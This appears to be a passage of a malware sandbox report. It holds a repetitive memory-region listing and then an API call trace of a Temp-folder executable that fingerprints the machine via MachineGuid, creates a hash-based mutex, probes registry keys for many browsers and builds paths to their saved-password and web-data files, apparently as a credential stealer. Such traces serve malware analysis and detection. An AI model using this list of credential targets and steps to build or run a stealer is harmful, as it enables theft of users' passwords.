1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 749 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 750 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 751 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 752 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 753 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 754 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 755 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 756 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 757 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 758 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 759 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 760 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 761 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 762 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 763 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 764 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 765 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 766 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 767 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 768 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 769 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 770 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 771 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 772 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 773 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 774 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 775 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 776 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 777 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 778 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 779 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 780 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 781 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 782 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 783 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 784 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 785 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 786 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 787 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 788 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 789 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 790 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 791 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 792 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 793 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 794 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 795 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 796 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 797 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 798 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 799 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 800 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 801 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 802 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 803 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 804 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 805 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 806 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 807 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 808 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 809 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 810 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 811 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 812 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 813 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 814 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 815 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 816 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 817 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 818 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 819 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 820 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 821 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 822 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 823 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 824 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 825 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 826 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 827 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 828 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 829 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 830 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Thread: id = 11 os_tid = 0x8d4 [0062.321] GetCommandLineW () returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" [0062.322] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0062.359] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb", pNumArgs=0x19ff7c | out: pNumArgs=0x19ff7c) returned 0x627f98*="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" [0062.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.360] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe", lpSrch="-u") returned 0x0 [0062.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.361] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb", lpSrch="-u") returned 0x0 [0062.361] SetErrorMode (uMode=0x3) returned 0x8001 [0062.362] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x774a0000 [0062.363] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x75360000 [0062.363] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x74720000 [0062.531] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fd7c | out: lpWSAData=0x19fd7c) returned 0 [0062.541] GetProcessHeap () returned 0x620000 [0062.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x633ed0 [0062.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.543] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fedc | out: phkResult=0x19fedc*=0x178) returned 0x0 [0062.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.544] RegQueryValueExA (in: hKey=0x178, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x633ed0, lpcbData=0x19fed8*=0x208 | out: lpType=0x0, lpData=0x633ed0*=0x30, lpcbData=0x19fed8*=0x25) returned 0x0 [0062.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.545] RegCloseKey (hKey=0x178) returned 0x0 [0062.545] GetProcessHeap () returned 0x620000 [0062.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x62b800 [0062.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.546] CryptAcquireContextW (in: phProv=0x19febc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19febc*=0x6265d8) returned 1 [0062.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.625] CryptCreateHash (in: hProv=0x6265d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x19fec0 | out: phHash=0x19fec0) returned 1 [0062.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.628] CryptHashData (hHash=0x62d2d0, pbData=0x633ed0, dwDataLen=0x24, dwFlags=0x0) returned 1 [0062.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.629] CryptGetHashParam (in: hHash=0x62d2d0, dwParam=0x2, pbData=0x62b800, pdwDataLen=0x19feb8, dwFlags=0x0 | out: pbData=0x62b800, pdwDataLen=0x19feb8) returned 1 [0062.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.630] CryptDestroyHash (hHash=0x62d2d0) returned 1 [0062.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0062.631] CryptReleaseContext (hProv=0x6265d8, dwFlags=0x0) returned 1 [0062.631] GetProcessHeap () returned 0x620000 [0062.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x31) returned 0x62d150 [0062.631] GetProcessHeap () returned 0x620000 [0062.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b800 | out: hHeap=0x620000) returned 1 [0062.632] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x62d150, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0062.632] GetProcessHeap () returned 0x620000 [0062.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x42) returned 0x626848 [0062.632] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x62d150, cbMultiByte=-1, lpWideCharStr=0x626848, cchWideChar=33 | out: lpWideCharStr="B7274519EDDE9BDC8AE51348A4AEC640") returned 33 [0062.632] GetProcessHeap () returned 0x620000 [0062.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6265d8 [0062.632] GetProcessHeap () returned 0x620000 [0062.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x626848 | out: hHeap=0x620000) returned 1 [0062.633] GetProcessHeap () returned 0x620000 [0062.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62d150 | out: hHeap=0x620000) returned 1 [0062.633] GetProcessHeap () returned 0x620000 [0062.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633ed0 | out: hHeap=0x620000) returned 1 [0062.634] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="B7274519EDDE9BDC8AE51348") returned 0x180 [0062.634] GetLastError () returned 0x0 [0062.634] GetProcessHeap () returned 0x620000 [0062.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1388) returned 0x635178 [0062.634] GetProcessHeap () returned 0x620000 [0062.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b800 [0062.858] GetProcessHeap () returned 0x620000 [0062.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x636508 [0062.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.858] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x636508, pcbData=0x19fb98*=0x104 | out: pdwType=0x0, pvData=0x636508, pcbData=0x19fb98*=0x104) returned 0x2 [0062.859] GetProcessHeap () returned 0x620000 [0062.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636508 | out: hHeap=0x620000) returned 1 [0062.860] GetProcessHeap () returned 0x620000 [0062.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x636508 [0062.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.861] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\ComodoGroup\\IceDragon\\Setup", pszValue="SetupPath", pdwType=0x0, pvData=0x636508, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x636508, pcbData=0x19fba8*=0x104) returned 0x2 [0062.861] GetProcessHeap () returned 0x620000 [0062.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636508 | out: hHeap=0x620000) returned 1 [0062.873] GetProcessHeap () returned 0x620000 [0062.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x636508 [0062.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.874] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Apple Computer, Inc.\\Safari", pszValue="InstallDir", pdwType=0x0, pvData=0x636508, pcbData=0x19fb9c*=0x104 | out: pdwType=0x0, pvData=0x636508, pcbData=0x19fb9c*=0x104) returned 0x2 [0062.874] GetProcessHeap () returned 0x620000 [0062.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636508 | out: hHeap=0x620000) returned 1 [0062.874] GetProcessHeap () returned 0x620000 [0062.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x636508 [0062.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.875] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\K-Meleon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x636508, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x636508, pcbData=0x19fba4*=0x104) returned 0x2 [0062.875] GetProcessHeap () returned 0x620000 [0062.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636508 | out: hHeap=0x620000) returned 1 [0062.876] GetProcessHeap () returned 0x620000 [0062.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x636508 [0062.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.877] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\mozilla.org\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x636508, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x636508, pcbData=0x19fb8c*=0x104) returned 0x2 [0062.877] GetProcessHeap () returned 0x620000 [0062.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636508 | out: hHeap=0x620000) returned 1 [0062.877] GetProcessHeap () returned 0x620000 [0062.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x636508 [0062.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.878] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x636508, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x636508, pcbData=0x19fb8c*=0x104) returned 0x2 [0062.878] GetProcessHeap () returned 0x620000 [0062.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636508 | out: hHeap=0x620000) returned 1 [0062.878] GetProcessHeap () returned 0x620000 [0062.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x636508 [0062.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.879] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Flock", pszValue="CurrentVersion", pdwType=0x0, pvData=0x636508, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x636508, pcbData=0x19fba4*=0x104) returned 0x2 [0062.879] GetProcessHeap () returned 0x620000 [0062.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636508 | out: hHeap=0x620000) returned 1 [0062.880] GetProcessHeap () returned 0x620000 [0062.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x633ed0 [0062.880] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0062.881] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x633ed0 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0062.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.886] StrStrW (lpFirst="C:\\Program Files (x86)", lpSrch="(x86)") returned="(x86)" [0062.888] GetProcessHeap () returned 0x620000 [0062.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6382b0 [0062.888] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x6382b0, nSize=0x104 | out: lpDst="C:\\Program Files") returned 0x11 [0062.888] GetProcessHeap () returned 0x620000 [0062.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6a) returned 0x6384c0 [0062.889] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.890] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\NETGATE\\Black Hawk", arglist=0x19fbb4 | out: param_1="C:\\Program Files\\NETGATE\\Black Hawk") returned 35 [0062.890] GetProcessHeap () returned 0x620000 [0062.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a) returned 0x6270d0 [0062.890] GetProcessHeap () returned 0x620000 [0062.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.892] PathFileExistsW (pszPath="C:\\Program Files\\NETGATE\\Black Hawk") returned 0 [0062.892] GetProcessHeap () returned 0x620000 [0062.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6270d0 | out: hHeap=0x620000) returned 1 [0062.892] GetProcessHeap () returned 0x620000 [0062.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6382b0 | out: hHeap=0x620000) returned 1 [0062.893] GetProcessHeap () returned 0x620000 [0062.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3fcc) returned 0x6382b0 [0062.893] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.894] wvsprintfW (in: param_1=0x6382b0, param_2="%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}", arglist=0x19fbbc | out: param_1="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 90 [0062.894] GetProcessHeap () returned 0x620000 [0062.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb8) returned 0x63c288 [0062.894] GetProcessHeap () returned 0x620000 [0062.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6382b0 | out: hHeap=0x620000) returned 1 [0062.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.896] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 0 [0062.896] GetProcessHeap () returned 0x620000 [0062.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c288 | out: hHeap=0x620000) returned 1 [0062.919] GetProcessHeap () returned 0x620000 [0062.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6382b0 [0062.920] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0062.920] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6382b0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0062.922] GetProcessHeap () returned 0x620000 [0062.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0062.922] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.923] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 78 [0062.923] GetProcessHeap () returned 0x620000 [0062.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x62ad28 [0062.923] GetProcessHeap () returned 0x620000 [0062.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.925] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0062.925] GetProcessHeap () returned 0x620000 [0062.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62ad28 | out: hHeap=0x620000) returned 1 [0062.926] GetProcessHeap () returned 0x620000 [0062.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0062.926] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.927] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 76 [0062.927] GetProcessHeap () returned 0x620000 [0062.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9c) returned 0x62ad28 [0062.927] GetProcessHeap () returned 0x620000 [0062.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.929] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 0 [0062.929] GetProcessHeap () returned 0x620000 [0062.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62ad28 | out: hHeap=0x620000) returned 1 [0062.929] GetProcessHeap () returned 0x620000 [0062.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0062.930] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.930] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 59 [0062.931] GetProcessHeap () returned 